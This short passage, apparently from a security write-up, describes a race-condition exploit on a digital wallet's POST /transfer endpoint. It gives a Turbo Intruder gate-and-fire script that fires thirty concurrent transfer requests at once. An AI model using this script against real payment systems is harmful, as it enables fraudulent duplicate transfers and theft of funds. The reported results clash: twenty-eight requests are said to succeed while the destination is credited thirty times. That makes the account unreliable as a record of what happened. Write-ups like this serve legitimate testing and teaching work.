The application was a digital wallet. The endpoint was POST /transfer. The bug was that nobody had ever asked what happens if you send the same request twice at the same time.
python
turbo-intruder, gate-and-fire
engine = RequestEngine(endpoint=target,concurrentConnections=30,requestsPerConnection=1,engine=Engine.BURP2)for i in range(30):engine.queue(req, gate='race1')engine.openGate('race1')
Twenty-eight of thirty requests succeeded. Each one debited the source account. The destination account was credited thirty times.